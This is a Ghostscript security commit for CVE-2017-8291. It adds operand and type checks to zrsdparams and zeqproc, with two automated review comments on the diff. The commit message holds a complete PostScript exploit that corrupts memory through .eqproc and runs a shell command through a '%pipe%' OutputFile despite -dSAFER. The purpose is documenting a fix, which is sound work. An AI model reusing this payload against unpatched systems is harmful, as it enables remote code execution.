gs: apply mitigations against CVE-2017-8291 (thanks jsmoody)
To reproduce: gs -q -dNOPAUSE -dSAFER '-sDEVICE=ppmraw' '-sOutputFile=/dev/null' <<. %!PS-Adobe-3.0 EPSF-3.0 %%BoundingBox: -0 -0 100 100 /size_from 10000 def /size_step 500 def /size_to 65000 def /enlarge 1000 def %/bigarr 65000 array def 0 size_from size_step size_to { pop 1 add } for /buffercount exch def /buffersizes buffercount array def 0 size_from size_step size_to { buffersizes exch 2 index exch put 1 add } for pop /buffers buffercount array def 0 1 buffercount 1 sub { /ind exch def buffersizes ind get /cursize exch def cursize string /curbuf exch def buffers ind curbuf put cursize 16 sub 1 cursize 1 sub { curbuf exch 255 put } for } for /buffersearchvars [0 0 0 0 0] def /sdevice [0] def enlarge array aload { .eqproc buffersearchvars 0 buffersearchvars 0 get 1 add put buffersearchvars 1 0 put buffersearchvars 2 0 put buffercount { buffers buffersearchvars 1 get get buffersizes buffersearchvars 1 get get 16 sub get 254 le { buffersearchvars 2 1 put buffersearchvars 3 buffers buffersearchvars 1 get get put buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put } if buffersearchvars 1 buffersearchvars 1 get 1 add put } repeat buffersearchvars 2 get 1 ge { exit } if %(.) print } loop .eqproc .eqproc .eqproc sdevice 0 currentdevice buffersearchvars 3 get buffersearchvars 4 get 16#7e put buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put put buffersearchvars 0 get array aload sdevice 0 get 16#3e8 0 put sdevice 0 get 16#3b0 0 put sdevice 0 get 16#3f0 0 put currentdevice null false mark /OutputFile (%pipe%echo gotce) .putdeviceparams 1 true .outputpage .rsdparams %{ } loop 0 0 .quit %asdf .
parent
b767b2ce23
commit
0af7d1fe35
2 changed files with 21 additions and 7 deletions
|
@ -47,13 +47,19 @@ zrsdparams(i_ctx_t *i_ctx_p)
|
|||
ref *pFilter;
|
||||
ref *pDecodeParms;
|
||||
int Intent;
|
||||
bool AsyncRead;
|
||||
bool AsyncRead = false;
|
||||
ref empty_array, filter1_array, parms1_array;
|
||||
uint i;
|
||||
int code;
|
||||
int code = 0;
|
||||
|
||||
if (ref_stack_count(&o_stack) < 1)
|
||||
return_error(e_stackunderflow);
|
||||
if (!r_has_type(op, t_dictionary) && !r_has_type(op, t_null))
|
||||
return_error(e_typecheck);
|
||||
|
||||
make_empty_array(&empty_array, a_readonly);
|
||||
if (dict_find_string(op, "Filter", &pFilter) > 0) {
|
||||
if (r_has_type(op, t_dictionary)
|
||||
&& dict_find_string(op, "Filter", &pFilter) > 0) {
|
||||
if (!r_is_array(pFilter)) {
|
||||
if (!r_has_type(pFilter, t_name))
|
||||
return_error(e_typecheck);
|
||||
|
@ -92,10 +98,12 @@ zrsdparams(i_ctx_t *i_ctx_p)
|
|||
return_error(e_typecheck);
|
||||
}
|
||||
}
|
||||
if ((code = dict_int_param(op, "Intent", 0, 3, 0, &Intent)) < 0 ||
|
||||
(code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0
|
||||
)
|
||||
return code;
|
||||
if (r_has_type(op, t_dictionary))
|
||||
code = dict_int_param(op, "Intent", 0, 3, 0, &Intent);
|
||||
|
||||
if (r_has_type(op, t_dictionary))
|
||||
if ((code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0)
|
||||
return code;
|
||||
push(1);
|
||||
op[-1] = *pFilter;
|
||||
if (pDecodeParms)
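Review bot: The result of the `Intent` lookup is no longer checked. The new `code = dict_int_param(op, "Intent", 0, 3, 0, &Intent);` is followed directly by the `AsyncRead` lookup, which overwrites `code`, whereas the removed condition returned on `< 0`. A malformed `Intent` entry is therefore accepted silently, and `Intent` is still declared as `int Intent;` with no initializer, so it may be left indeterminate when the operand is null or the lookup fails. I would add `if (code < 0) return code;` right after the Intent lookup and change the declaration to `int Intent = 0;`, matching the initializers this commit gives `AsyncRead` and `code`. zrsdparams continues outside the hunk, so whether `Intent` is read later cannot be confirmed from here.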
|
||||
|
|
|
@ -55,6 +55,12 @@ zeqproc(i_ctx_t *i_ctx_p)
|
|||
ref2_t stack[MAX_DEPTH + 1];
|
||||
ref2_t *top = stack;
|
||||
|
||||
if (ref_stack_count(&o_stack) < 2)
|
||||
return_error(e_stackunderflow);
|
||||
if (!r_is_array(op - 1) || !r_is_array(op)) {
|
||||
return_error(e_typecheck);
|
||||
}
|
||||
|
||||
make_array(&stack[0].proc1, 0, 1, op - 1);
|
||||
make_array(&stack[0].proc2, 0, 1, op);
|
||||
for (;;) {
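Review bot: The new operand checks at the top of zeqproc have no comment saying why they are there, and the two `if` statements use different brace styles. The `make_array` calls just below build refs directly from `op - 1` and `op`, so a short comment such as `/* validate operand count and array type before make_array (CVE-2017-8291) */` would keep a later cleanup from dropping the checks. Removing the braces around the `e_typecheck` return would match the stack-count check above it. The body of zeqproc continues past the end of the hunk.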
|
||||
|
|